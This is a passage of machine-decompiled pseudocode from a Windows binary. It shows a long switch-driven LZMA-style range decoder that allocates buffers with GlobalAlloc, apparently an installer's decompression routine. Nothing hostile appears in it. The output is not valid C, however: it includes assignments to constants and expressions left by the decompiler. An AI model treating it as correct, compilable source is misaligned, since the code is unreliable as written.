						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
